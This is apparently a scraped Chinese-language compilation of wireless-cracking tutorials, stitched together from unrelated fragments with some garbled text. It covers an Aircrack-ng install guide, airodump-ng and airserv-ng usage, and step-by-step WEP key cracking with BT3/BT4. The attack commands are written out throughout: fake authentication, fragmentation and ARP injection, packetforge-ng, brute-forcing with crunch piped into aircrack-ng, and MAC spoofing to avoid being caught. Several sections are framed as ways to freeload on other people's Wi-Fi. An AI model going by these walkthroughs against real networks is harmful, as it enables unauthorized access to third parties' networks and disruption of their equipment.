Aircrack-ng_for_Windows_教程
- 格式:doc
- 大小:137.00 KB
- 文档页数:4
渗透系统知识点总结一、渗透系统概述渗透测试是一种通过模拟黑客攻击的方式,评估和测试计算机系统、网络、应用程序等信息系统安全性的方法。
渗透测试的目的是发现系统漏洞和安全弱点,然后通过修复这些问题来提高系统的安全性。
渗透测试通常包括主机渗透测试、网络渗透测试、应用程序渗透测试等内容。
渗透测试系统是指用于进行渗透测试的一套工具、框架和平台,它们可以帮助渗透测试人员更有效地发现系统漏洞和安全弱点。
渗透测试系统通常包括渗透测试工具、渗透测试框架、操作系统和其他相关工具。
本文将对渗透系统的知识点进行总结,包括渗透测试的步骤、常用的渗透测试工具和框架、渗透测试操作系统等内容。
二、渗透测试的步骤渗透测试通常包括以下步骤:1. 信息收集:通过搜索引擎、社交媒体、WHOIS查询等方式,获取与目标系统相关的信息,包括IP地址、域名、子域名、主机配置等。
2. 脚本扫描:使用渗透测试工具进行脚本扫描,探测目标系统的开放端口、服务信息和漏洞。
3. 漏洞扫描:使用漏洞扫描工具对目标系统进行漏洞扫描,发现系统存在的安全漏洞。
4. 社会工程学:通过社会工程学技术(如钓鱼攻击、电话诈骗等)获取目标系统的用户凭据和机密信息。
5. 渗透测试:利用渗透测试工具模拟黑客攻击,获取目标系统的权限和控制权。
6. 数据收集:获取目标系统的重要数据,如数据库信息、文件系统、系统配置信息等。
7. 清理足迹:清理攻击痕迹,防止被发现并留下痕迹。
渗透测试的步骤可以根据具体情况进行调整,但通常包括以上内容。
在渗透测试系统中,渗透测试工具和框架是进行渗透测试的重要组成部分。
三、常用的渗透测试工具渗透测试工具是进行渗透测试的重要工具,下面介绍一些常用的渗透测试工具:1. Nmap:网络扫描工具,可以用于主机扫描、端口扫描和服务探测。
2. Metasploit:渗透测试框架,包含大量的渗透测试模块和Exploit,可以用于攻击、入侵和控制目标系统。
3. Burp Suite:用于Web应用程序渗透测试的集成平台,包含代理服务器、拦截器、扫描器等功能。
一、什么是airodump-ngairodump-ng 是一个无线网络数据包捕获工具,它是Aircrack-ng套装中的一个重要组件。
它的主要功能是捕获802.11协议无线网络的数据包,并对这些数据包进行分析,从而帮助用户识别和解决无线网络中的安全问题。
二、airodump-ng 的主要功能1. 无线网络数据包捕获:airodump-ng 可以监听周围的无线网络,捕获数据包并存储在文件中,以备进一步分析和破解。
2. 信道扫描:airodump-ng 可以扫描周围的无线网络,并列出每个网络所使用的信道信息,帮助用户选择最佳的信道设置。
3. 客户端监视:airodump-ng 可以监视周围的客户端设备,并显示它们与无线网络的关联情况,包括MAC位置区域、信号强度、数据流量等信息。
4. 渗透测试:airodump-ng 还可以配合Aircrack-ng套装中的其他工具,对无线网络进行渗透测试,识别和利用网络中的安全漏洞。
三、airodump-ng 的用法1. 监视无线网络使用airodump-ng 命令加上无线网卡的名字,可以开始监视周围的无线网络:```airodump-ng wlan0```这条命令会列出周围所有可用的无线网络,并实时更新它们的信息,包括信号强度、加密类型、MAC位置区域等。
2. 捕获数据包使用airodump-ng 命令加上需要监视的无线网络的SSID和信道信息,可以开始捕获该无线网络的数据包:```airodump-ng --bssid 00:11:22:33:44:55 --channel 6 wlan0```这条命令会将捕获到的数据包保存在一个文件中,用户可以稍后使用其他工具对这些数据包进行进一步分析。
3. 客户端监视使用airodump-ng 命令加上无线网络的BSSID信息,可以开始监视该无线网络的客户端设备:```airodump-ng --bssid 00:11:22:33:44:55 wlan0```这条命令会列出当前与该无线网络关联的客户端设备,并实时更新它们的信息,包括MAC位置区域、信号强度、数据流量等。
蹭网工具WinAirCrackPack工具包\BT3 (BackTrack 3)的使用介绍破解静态WEP KEY全过程发现首先通过NetStumbler确认客户端已在某AP的覆盖区内,并通过AP信号的参数进行‘踩点’(数据搜集)。
NetStumbler 下载地址/downloads/通过上图的红色框框部分内容确定该SSID名为demonalex的AP为802.11b类型设备,Encryption属性为‘已加密’,根据802.11b所支持的算法标准,该算法确定为WEP。
有一点需要注意:NetStumbler对任何有使用加密算法的STA[802.11无线站点]都会在Encryption属性上标识为WEP算法,如上图中SSID为gzpia的AP使用的加密算法是WPA2-AES。
破解下载Win32版AirCrack程序集---WinAirCrackPack工具包(下载地址:/download/wireless/aircrack/WinAircrackPack.zip)。
解压缩后得到一个大概4MB的目录,其中包括六个EXE文件:aircrack.exe 原WIN32版aircrack程序airdecap.exe WEP/WPA解码程序airodump.exe 数据帧捕捉程序Updater.exe WIN32版aircrack的升级程序WinAircrack.exe WIN32版aircrack图形前端wzcook.exe 本地无线网卡缓存中的WEPKEY记录程序我们本次实验的目的是通过捕捉适当的数据帧进行IV(初始化向量)暴力破解得到WEP KEY,因此只需要使用airodump.exe(捕捉数据帧用)与WinAircrack.exe(破解WEP KEY用)两个程序就可以了。
首先打开ariodump.exe程序,按照下述操作:首先程序会提示本机目前存在的所有无线网卡接口,并要求你输入需要捕捉数据帧的无线网卡接口编号,在这里我选择使用支持通用驱动的BUFFALO WNIC---编号‘26’;然后程序要求你输入该WNIC的芯片类型,目前大多国际通用芯片都是使用‘Herme sI/Realtek’子集的,因此选择‘o’;然后需要输入要捕捉的信号所处的频道,我们需要捕捉的AP所处的频道为‘6’;提示输入捕捉数据帧后存在的文件名及其位置,若不写绝对路径则文件默认存在在winaircrack的安装目录下,以.cap结尾,我在上例中使用的是‘last’;最后winaircrack提示:‘是否只写入/记录IV[初始化向量]到cap文件中去?’,我在这里选择‘否/n’;确定以上步骤后程序开始捕捉数据包。
crunch用法Crunch是一个常用的密码破解工具,它可以通过字典攻击、暴力破解等方式破解密码。
以下是Crunch的使用方法:1.安装Crunch首先需要下载并安装Crunch。
Crunch可在Linux系统中使用,也可在Windows系统中使用。
在Linux系统中,可以通过在终端中输入以下命令安装Crunch:sudo apt-get install crunch在Windows系统中,可以在Crunch官网下载Crunch,然后解压缩并安装。
2.使用Crunch生成字典Crunch可以生成密码字典,以进行密码破解。
要生成字典,可以在终端或命令行中输入以下命令:crunch [min] [max] [charset] [options]其中,[min]和[max]表示生成密码的最小长度和最大长度;[charset]表示生成密码所使用的字符集;[options]表示其他选项。
例如,要生成6到8位数字和小写字母混合的密码字典,可以输入以下命令:crunch 6 8 0123456789abcdefghijklmnopqrstuvwxyz -o password.txt这将生成一个名为password.txt的文件,其中包含所有6到8位数字和小写字母混合的密码组合。
3.使用Crunch进行密码破解生成密码字典后,可以使用Crunch进行密码破解。
要破解密码,可以在终端或命令行中输入以下命令:crunch [min] [max] [charset] | [command]其中,[min]和[max]表示密码的最小长度和最大长度;[charset]表示密码所使用的字符集;[command]表示执行密码破解的命令。
例如,要破解使用6到8位数字和小写字母混合的密码,可以输入以下命令:crunch 6 8 0123456789abcdefghijklmnopqrstuvwxyz | aircrack-ng -w -这将使用aircrack-ng工具对生成的密码进行破解。
Aircrack-ng介绍1、介绍 Aircrack-ng主要使⽤了两种攻击⽅式进⾏WEP破解:⼀种是FMS攻击;⼀种是KoreK攻击。
2、主要组件 1、aircrack-ng 主要⽤于WEP及WPA-PSK密码的恢复,主要airodump-ng收集到⾜够数量的数据包,aircrack-ng就可以⾃动检测数据包并判断是否可以破解。
2、airmon-ng ⽤于改变⽆线⽹卡⼯作模式,以便其他⼯具的顺利使⽤。
3、airodump-ng ⽤于捕获802.11数据报⽂,以便于aircrack-ng破解。
4、aireplay-ng 在进⾏WEP及WPA-PSK密码恢复时,可以根据需要创建特殊的⽆线⽹络数据报⽂及流量。
5、airserv-ng 可以将⽆线⽹卡连接⾄某⼀特定端⼝,为攻击时灵活调⽤做准备。
6、airolib-ng 进⾏WPA Rainbow Table攻击时,⽤于建⽴特定数据库⽂件。
7、airdecap-ng ⽤于解开处于加密状态的数据包。
8、airdriver-ng ⽤于显⽰出Aircrack-ng所⽀持的全部⽆线⽹卡芯⽚列表。
9、airdecloak-ng ⽤于分析⽆线数据报⽂时过滤出指定⽆线⽹络数据。
10、packetforge-ng 为注⼊攻击制作特殊加密报⽂,主要⽤于⽆客户端破解攻击。
11、wesside-ng ⾃动化的WEP破解⼯具,加⼊Fragmentation攻击能⼒。
12、thiptun-ng 尚处于概念阶段的破解⼯具,主要针对采⽤WPA TKIP加密且启⽤QoS的⽆线⽹络。
首先安装Aircrack-ngwget /aircrack-ng-1.1.tar.gztar -zxvf aircrack-ng-1.1.tar.gzcd aircrack-ng-1.1直接编译会出错:make -C src allmake[1]: 正在进入目录 `/home/wuyongzhouling/aircrack-ng-1.1/src'make -C osdepmake[2]: 正在进入目录 `/home/wuyongzhouling/aircrack-ng-1.1/src/osdep'Building for Linuxmake[3]: 正在进入目录 `/home/wuyongzhouling/aircrack-ng-1.1/src/osdep'gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o osdep.o osdep.cgcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o network.o network.cgcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o linux.o linux.clinux.c: 在函数‘is_ndiswrapper’中:linux.c:165:17: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘linux_set_rate’中:linux.c:334:22: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘linux_set_channel’中:linux.c:807:22: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘linux_set_freq’中:linux.c:896:22: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘set_monitor’中:linux.c:1022:22: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘do_linux_open’中:linux.c:1366:12: 错误:变量‘unused_str’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c:1352:15: 错误:变量‘unused’被设定但未被使用 [-Werror=unused-but-set-variable]linux.c: 在函数‘get_battery_state’中:linux.c:1982:35: 错误:变量‘current’被设定但未被使用 [-Werror=unused-but-set-variable]cc1: all warnings being treated as errorsmake[3]: *** [linux.o] 错误 1make[3]:正在离开目录 `/home/wuyongzhouling/aircrack-ng-1.1/src/osdep'make[2]: *** [all] 错误 2make[2]:正在离开目录 `/home/wuyongzhouling/aircrack-ng-1.1/src/osdep'make[1]: *** [osd] 错误 2make[1]:正在离开目录 `/home/wuyongzhouling/aircrack-ng-1.1/src'make: *** [all] 错误 2解决方式:编辑vicommon.mak,去掉CFLAGS ?= -g -W -Wall -Werror -O3中的“-Werror”选项,也就是:CFLAGS ?= -g -W -Wall -O3。
利用BT3破解WEP简明教程【多图】2010-02-10 (BT4)2009年10月22日于 2:15 上午ZephyrXT抢板凳文中所用到的mac地址均处理过所用软件为BT3,官网地址:/backtrack_download.html软件下载地址:/downloads/ (最新版本已更新到BT4 Final 且提供WM镜像下载,省去安装烦恼. BT4破解方法与BT3相同——也可参考本文评论部分;如今无线路由WPA2加密业已流行,所以破解的机会并不那么大.仅供技术参考而已)(2010-04-07:考虑到手动破解十分复杂;已上传《无线网络密码破解傻瓜图文》(下载)——毫无疑问,此方法相对方便得多)虚拟机为VMware,多特华军都有,可自行搜索。
虚拟机推荐用vmware,virtualbox 不支持部分网卡。
另附一款无线信号搜索工具,inSSIDer,可去此处下载,或者此处第一步,用inSSIDer搜索你要破解的无线路由,记住SSID,也就是无线网络的名字,mac地址和信道号第二步,打开设置好的虚拟机,并启动虚拟机的系统(这一步怎么用就不说了),另外,如果不用虚拟机系统,把下载的bt3镜像刻成光盘或考到U盘中启动电脑也是十分好用的。
推荐用u盘,光盘启动比较慢。
下图为启动好的BT3界面,点击红框内的图标启动命令行输入ifconfig -a来查看电脑上所有网卡的信息,eth为有线网卡,L0为未识别的网卡,wlan0为已识别的无线网卡,若采用的是usb无线网卡这个名称还可能是rausb,反正出现什么名字记住就是了,后面要用到的,还可以输入iwconfig只查看无线的网卡。
如下图现在输入ifconfig -a wlan0 up, 意思是在linux系统中将可用的无线网卡激活,如图现在要用到从inssider中得到的信息了,输入airmon-ng start wlan0 6, 这里6是信道号,开始用wlan0监听6频道上的所有网络,如图:并显示了你网卡的芯片型号:rtl8187(监听模式开启)然后开始抓包了,输入airodump-ng –ivs -w 123 -c 6 wlan0, ivs是数据包的格式,123是临时文件的名称,wlan0是所用网络,6为信道号,如图:BSSID是搜到的无线路由的mac;pwr是信号强度,越高越好啦;data是有无客户端,不为零的优先选择;ch是信道;en是加密方式,选择wep的,这里我们拿第一个开刀,本人是有道德的,只是学习,绝不破坏!!!!!!!了解了以上的信息后,在开一个命令行窗口输入aireplay-ng -1 0 -e 路由的名字 -a 路由的mac -h 自己用来破解的无线网卡的mac wlan0 回车,配合下图更好理解:执行上面命令后显示:上图说明我们的无线网卡和路由挂接成功,接下来就要破接啦!!!!!!!!!再开一个命令行,输入aireplay-ng -5 -b 路由mac -h 本地无线网卡mac wlan0,回车后:“使用这个数据包吗?”输入y回车如下图:记住这个xor文件的文件名,后面会用到接着输入packetforge-ng -0( 这个是零不是英文字母o) -a 路由的mac -h 无线网卡的mac -k 255.255.255.255 -l(这个事小些的L) 255.255.255.255 -y *.xor -w myarp到此输入完成后回车,这行里的*.xor就是刚才让你记住的那个文件名,千万要仔细,这行比较长!!!!!!!!!!!!!如图:然后出现wrote to packet to : myarp 将数据写入数据包myarp接着再开一个命令行输入下图的命令:回车后显示:使用该数据包吗?输入y回车,如下图:如果成功的话会看到密码就在你眼前喽!!!!下图就是密码:把中间冒号去掉,1122334455就是密码啦,快去上网吧!!!附:如果不成功,可等到上上步的数据包再大一些再用上一行的命令破,一般每涨一万两万的就破解一回相关日志∙暂无相关日志软件BT3, BT4, WEP, 破解评论发表评论反向链接∙作者 ZephyrXT 于大约 4 个月前发表. 回复bt4 wifi 破解———————pre———————1.下载光盘版BT4.iso,copy其中的boot和bt4到U盘,windows下运行bootinst.bat安装到U盘。
aircrack-ng详细教程/download.php?id=529&ResourceID=313教程:1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0 (wlan0是无线网卡的端口,可在终端中输入ifconfig 查看)2、查看无线AP在终端中输入:sudo airodump-ng mon0(特别说明:启动监控模式后无线网的端口现在是mon0 !!!)看看有哪些采用wep加密的AP在线,然后按ctrl+c 退出,保留终端3、抓包另开一个终端,输入:sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0(-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP'sMAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)4、与AP建立虚拟连接再另开一个终端,输入:sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0(-h后面跟着的My MAC是自己的无线网卡的MAC地址,命令:iwlist wlan0 scanning可查看自己的MAC地址;自己的MAC 地址为ifconfig命令下wlan0对应的mac 地址)5、进行注入成功建立虚拟连接后输入:sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)6、解密收集有15000个以上的DATA之后,另开一个终端,输入:sudo aircrack-ng wep*.cap进行解密(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的)7、收工破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。
Ubuntu下Aircrack-ng工具包的使用2011-11-25 11:24 Jasey_Wang 分享我要评论(0)字号:T | T由于在Windows环境下不能如Linux环境下直接调用无线网卡,所以需要使用其他工具将无线网卡载入,以便攻击工具能够正常使用,在无线攻击套装Aircrack-ng的Windows版本下内置这样的工具,就是Aircrack-ng,下面给大家介绍一下在Ubuntu下Aircrack-ng工具包的使用。
AD:2013云计算架构师峰会超低价抢票中安装:$sudoapt-getinstallaircrack-ngAircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个:airmon-ng处理网卡工作模式airodump-ng抓包aircrack-ng破解aireplay-ng发包,干扰1)airmon-ng启动无线网卡进入Monitor模式,useage:airmon-ng<start|stop|check><interface>[channel]<start|stop|check>:启动,停止,检测<interface>:指定无线网卡[channel]:监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了2)airodump-ng抓包工具,我最喜欢用的,详细用法如下:usage:airodump-ng<options><interface>[,<interface>,...]Options:–ivs:仅将抓取信息保存为.ivs–write<prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分–beacons:保存所有的beacons,默认情况况下是丢弃那些无用的数据包的Filteroptions:–encrypt<suite>:使用密码序列过滤AP–netmask<netmask>:使用掩码过滤AP–bssid<bssid>:使用bssid过滤AP-a:过滤无关的客户端–help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文3)aireplay-ng搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.usage:aireplay-ng<options><replayinterface>Filteroptions:-bbssid:AP的MAC-ddmac:目标的MAC-ssmac:来源的MAC-mlen:最小包长度-nlen:最大包长度-D:禁用AP发现功能Replayoptions:-xnbpps:每秒包数量-pfctrl:框架设定(hex)-abssid:设置AP的mac-cdmac:设置目标的MAC-hsmac:设置来源的mac-gvalue:改变环缓存大小(默认8)Fakeauthattackoptions:-eessid:设置目标AP的SSID-onpckts:每秒爆破的包数量(0自动,默认1)-qsec:存活时间秒-yprga:共享可信的key流–help:显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.4)aircrack-ng破解KEY,漫长的过程.漫不漫长取决于两个方面:一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.usage:aircrack-ng[options]<.cap/.ivsfile(s)>Commonoptions:-a<amode>:暴破(1/WEP,2/WPA-PSK)-e<essid>:选择essid为目标-b<bssid>:选择ap的mac为目标,就是破解识别的关键字-q:使用安静模式,无数出模式-C<macs>:将所有的AP合并为一个虚拟的–help:显示这个帮助就WEP破解说明,步骤:步骤:1.修改无线网卡状态:先down掉2.伪造无线网卡的MAC地址:安全起见,减少被抓到的可能3.修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡4.修改无线网卡状态:up5.查看网络状态,记录下AP的MAC和本机的MAC,确定攻击目标6.监听抓包:生成.cap或.ivs7.干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包8.破解.cap或.ivs,获得WEP密码,完成破解具体步骤:1、首先确定是否有wlan0的无线网卡端口,ifconfig即可知道。
Aircrack-ng InstallAircrack-ng from SourceRequirementsLinux∙Kernel headers and gcc as well as make have to be installed on your system.On Debian-based distros (Debian, Ubuntu, Xubuntu, …), issue the following command in a console to install them:sudo apt-get install build-essential∙OpenSSL (development). It is called openssl-dev or libssl-dev depending on your distribution.∙pkg-configThe following is required only if you want Airolib-ng:∙SQLite (development) > 3.3.17 (but latest version is recommended) WindowsIt requires additional libraries to be installed:∙OpenSSL (development): openssl-develThe following is required only if you want Airolib-ng:∙SQLite3 (development) > 3.3.17 (but latest version is recommended): libsqlite3-develOS XInstall the following via macports:∙gmake 3.81∙sqlite3Compiling and installingNote: For OS X, use 'gmake' instead of 'make'.Current versionIt requires some additional libraries:∙OpenSSL (libssl-dev on Debian-based system)∙SQLite > 3.3.17 (latest version is recommended) if you want to use Airolib-ngwget /aircrack-ng-1.2-beta3.tar.gztar -zxvf aircrack-ng-1.2-beta3.tar.gzcd aircrack-ng-1.2-beta3makemake installCompiling with Airolib-ng supportSimply append 'sqlite=true' parameter to make and make install:make sqlite=truemake sqlite=true installOS XChange CFLAGS in src/Makefile to point to the macpports install of SQLite3 before compiling. Change the following line:CFLAGS += -IincludetoCFLAGS += -Iinclude -arch i386 -I/opt/local/include -L/opt/local/lib Compiling with AirPcap support (cygwin only)1.Copy 'developer' directory from the AirPcap CD at the same level as'Aircrack-ng' directory2.Append 'airpcap=true' parameter to make:make airpcap=truemake installCompiling with Airolib-ng and AirPcap support (cygwin only)Simply append both parameter to make and make install:make sqlite=true airpcap=truemake sqlite=true installCompiling with CUDA support - Not supportedThis is still under heavy development so it is not yet been added to the backtrack repositories however it deserves mentioning. Aircrack-ng can be built with a switch to add GPU acceleration. In order to do this we need to grab Aircrack-ng from SVN (subversion). You must have the CUDA toolkit and the sdk already installed to be able to build this.svn co /branch/aircrack-ng-cuda/ aircrack-ng-cudaNext we will build it like normal but it needs a few extra arguments:cd aircrack-ng-cudaCUDA=true makemake CUDA=true sqlite=true unstable=true installAlso see: BackTrack 4 CUDA GuideLatest SVN (development) Sourcessvn co /trunk/ aircrack-ngcd aircrack-ngmakemake installLatest SVN with Airolib-ng support and experimental (unstable) programs (requires SQLite installed)(like Tkiptun-ng, Easside-ng (and buddy-ng), Wesside-ng and Besside-ng)make sqlite=true unstable=truemake sqlite=true unstable=true installLatest SVN with Airolib-ng and and experimental (unstable) programs plus external scripts(like Airoscript-ng, Versuck-ng, Airgraph-ng and Airdrop-ng)make sqlite=true unstable=true ext_scripts=truemake sqlite=true unstable=true ext_scripts=true installNote: Experimental scripts:Each scripts has its own dependencies, for details refer to the “README”file contained in their folderNightly Build/ contains a nightly tarball from each day. This is handy if you don't have access to SVN (subversion). Just download and build per building the current version instructions. Optionally you can enable the extra feat ures with “sqlite=true” and “unstable=true” per above.Legacywget /aircrack-ng-0.9.3.tar.gztar -zxvf aircrack-ng-0.9.3.tar.gzcd aircrack-ng-0.9.3makemake installTroubleshooting Tips"command not found" error messageAfter you do “make install” then try to use any of the Aircrack-ng suite commands, you get the error message “command not found” or similar. Your system will look for the Aircrack-ng commands in the directories defined by the PATH command.Normally, the Aircrack-ng suite programs and man pages are placed in:/usr/local/bin/usr/local/sbin/usr/local/manOn your system, to determine which directories have the Aircrack-ng programs enter the following. If using “locate” be sure to first run “updatedb”.locate aircrack-nglocate airmon-ngorfind / -name aircrack-ngfind / -name airmon-ngOnce you know the directories (exclude the source directories) then determine which directories are in your PATH. To see which directories are included in PATH on your particular system enter:echo $PATHIt should show something like:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/lib/ccache:/usr/local/sbin:/usr/local /bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/binAt this point compare the actual locations with the directories in your PATH. If the directories are missing from your PATH then you have a few options:∙Add the directories to your PATH. See the one or more of the following web sites for details of how to do this:/howto/basic/path.shtml/faq/howto-print-path-variable//linux/prepostpath.htm/od/linux101/l/blnewbie3_1_4.htm∙Change to the particul ar directory with “cd” and then run the commands from within the directory. Don't forget to add ”./” in front of each command.∙Specify the full path for each command. So if Aircrack-ng is located in the ”/usr/local/bin” directory then run the commandas ”/usr/local/bin/aircrack-ng”.∙Specify the location prefix when installing. Lets say you have /usr/bin and /usr/sbin directories in your PATH, then do “make prefix=/usr install”.This will install the programs to /usr/bin and /usr/sbin."build" - No such file or directoryOn Debian-based distros, if you get something similar to:/bin/sh: line 0: cd: /lib/modules/2.6.15-28-amd64-generic/build: No such file or directoryMakefile.inc:66: *** /lib/modules/2.6.15-28-amd64-generic/build is missing, please set KERNELPATH.Stop.Solution:The build directory gets installed together with the kernel headers, so either you lack the correct headers or your KERNELPATH is wrong. Please check that `uname -r` returns “2.6.15-28-amd64-generic”.Do a “sudo apt-get install linux-headers-`uname -r`” or just “sudo apt-get install linux-headers”.If uname returns exactly that string and the current headers are installed, the remove the headers and install them again. Also check /usr/src for installed header files, maybe it got mixed up for whatever reason.In the above examples, needless to say, change “2.6.15-28-amd64-generic” to whatever you are running."openssl/hmac.h" - No such file or directoryIf you get something similar to:crypto.h:12:26: error: openssl/hmac.h: No such file or directorycrypto.h:13:25: error: openssl/sha.h: No such file or directorycrypto.h:15:25: error: openssl/rc4.h: No such file or directorycrypto.h:16:25: error: openssl/aes.h: No such file or directorySolution: You are missing the OpenSSL development package. Depending on the distribution, download and install openssl-devel or libssl-devel (libssl-dev/Ubuntu/). Or worst case, install it from source: ."zlib.h" No such file or directoryIf you get something similar to:wesside-ng.c:54:18: error: zlib.h: No such file or directorySolution: You are missing the zlib development package. Depending on the distribution, download and install zlib-devel. Or worst case, install it from source: ."__le64" error on 64 bit machines when compilingYou get something similar to:radiotap-parser.h:29: error: conflicting types for ‘__le64’/usr/include/linux/types.h:158: error: previous declaration of ‘__le64’ was hereSee this thread for a solution.Installing pre-compiled binaries LinuxOpen your package manager and install 'Aircrack-ng' package. Be sure to check that the version offered is up-to-date – you may see problems with older versions, especially if you have a card for which support was added recently, e.g. ACX, Broadcom or Intel. Ubuntu and Debian are particularly problematic in this matter.WindowsThe Windows version of the Aircrack-ng suite does not have an install program. You must manually install (unzipping archive) the software.Here are the steps to follow for Windows XP:∙Download the latest version of the Aircrack-ng suite for Windows to your PC.The link for the zip file can be found on the Wiki home page.∙Unzip the contents of the Aircrack-ng zip file into “C:\”. This will createa directory called “aircrack-ng-0.9.3-win”. This directory name will varybased on the exact version that you downloaded. This main directory contains three subdirectories - “bin”, “src” and “test”.Prior to using the software, make sure to install the drivers for your particular wireless card. See this link for the instructions.To now use the Aircrack-ng suite, start Windows Explorer and double click on Aircrack-ng GUI.exe inside “bin” subdirectory. The GUI requires .NET Framework 2.0 to run (.NET Frameworks 1.0/1.1 are not able to run this executable, 2.0 or better MUST be installed).Alternatively, open a command prompt (Start menu → Execute→ cmd.exe) and change to the “C:\aircrack-ng-0.9-win\bin” directory and exe cute the individual commands.Important notes:∙Remember that Windows only supports a limited subset of the commands.∙Some troubleshooting tips specific to XP and Vista can be found on this page.Installing on Mac OSXThe simplest and easiest way to install on Mac OS X is via Macports. You simply do “sudo port install aircrack-ng”.Alternatively, use the following instructions:Make sure you have Xcode installed on your Mac, which can be found on the installer CD/DVD which came with your Mac. After getting the source you can do a simple “make && sudo make install” from the untarred directory. When you use the stable, you need to rename the Makefile.osx to Makefile and when you use the dev version it will autodetect you are using Darwin and compile fine.Mind you, airodump-ng and aireplay-ng are linux only and will not work under OSX native, so for reinjecting and sniffing you will have to use other means.If you have an intel Mac check out the VMware Fusion option which is mentioned lower on this page.Optional is openssl-dev and sqlite3 which can be installed through finkInstalling on OpenBSDSee this thread for instructions on installing and using the Aircrack-ng suite on OpenBSD.Installing VMware ImageImportant Note: Virtualization solutions (VMware/VirtualBox/Virtual PC/…) only work with USB cards. Card that are PCI/MiniPCI/PCMCIA/CardBus/Express Card/PCI Express/PCI-X/MiniPCI Express won't work at all.Requirements∙VMWare Workstation 6.02, VMWare Player 2.02 (freeware) or VMWare Fusion beta for intel based Mac's∙Wireless USB with one of the following chipsets:o rtl8187o rt2570o rt73∙Approximately 2Gb of hard disk spaceImportant note: VMWare Workstation 6.5 (and maybe Player 2.5 too) is known not to work correctly with rtl8187 driver. It uses the whole CPU and it seems to be hanging (it is really slow) for an unknown reason.Starting1.Install VMWare Workstation or Player2.Download this VMware image here or via BitTorrent and unpack it somewhere.3.Start VMware and select “open”. (Open the virtual machi ne)4.Attach your USB adapter.5.If the USB adapter is recognized automatically you'll find a small USB iconin the lower right corner of your VMWare window. If not you have to attach it manually.Notes:∙Uncompress the file on a filesystem that supports large files; NTFS, ext3, …(all FAT filesystems, including FAT32, do not support large files).∙Use 7-zip or Winrar (at least latest stable version) on Windows. For Linux (and other OSes), use p7zip (it should be in the repositories of yourdistribution).∙Here are a few reasons why the download doesn't work:o That sounds logical but make sure the URL is correct.o Check your DNS, make sure it can resolve “”(by the way, the server answers to ping). If it doesn't, use OpenDNS(Primary: 208.67.222.222 - Secondary: 208.67.220.220).∙You don't need any driver for wireless adapters (and other USB adapters) on the OS running VMware.∙The login credentials for the image are user id “root” with password “root”. On some versions the password is “toor”.∙The FAQ has some limited information about running the Aircrack-ng suite under VMWare.Manually attaching USB deviceOn VMware Player, the device should be shown in the title bar, click on it to activate it. On VMware Workstation, use menu “VM –> Removable devices –> USB” and then select the device:It will automatically unplug the device from Windows and attach it to the virtual machine.Loading Wireless Device DriversThe drivers can be loaded via the menu inside the VM:。
由于在Windows环境下不能如Linux环境般直接调用无线网卡,所以需要使用其他工具将无线网卡载入,以便攻击工具能够正常使用。
在无线攻击套装Aircrack-ng的Windows版本下内置了这样的工具,就是airserv-ng。
步骤1:打开CMD,通过cd命令进入到aircrack-ng for Windows版本所在目录,输入airserv-ng,可以看到如图5-29所示的内容。
图5-29 在CMD下运行airserv-ng
参数解释:
* -p,指定监听的端口,即提供连接服务的端口,默认为666;
* -d,载入无线网卡设备,需要驱动支持;
* -c,指定启动工作频道,一般设置为预攻击AP的工作频道,默认为1;
* -v,调试级别设定。
作为Windows下的破解,第一步就是使用airserv-ng来载入我们当前使用的无线网卡,为后续破解做准备,命令如下(注意:在命令中出现的引号一律使用英文下的引号输入):
airserv-ng -d "commview.dll|debug"
或者
airserv-ng -d "commview.dll| {my adapter id}"
输入完成后airserv-ng会自动搜寻现有无线网卡,会有提示,选择正确的无线网卡直接输入y,此时airserv-ng就在正常载入驱动后,同时开始监听本地的666端口。
换句话说,airserv-ng提供的是该无线网卡的网络服务,其他计算机上的用户也可以连接到这个端口来使用这块网卡,如图5-30所示。
图5-30 airserv-ng工作中
步骤2:现在可以使用airodump-ng来搜索当前无线环境了。
注意,要另开启一个CMD,再输入如下命令:
airodump-ng 127.0.0.1:666
这里在IP地址处输入为本机即127.0.0.1,端口采用的是默认的666。
图5-31 在CMD下运行airodump-ng
如图5-31所示,当确定预攻击目标AP的频道后,使用组合键Ctrl + C中断,即可使用如下参数来精确定位目标:
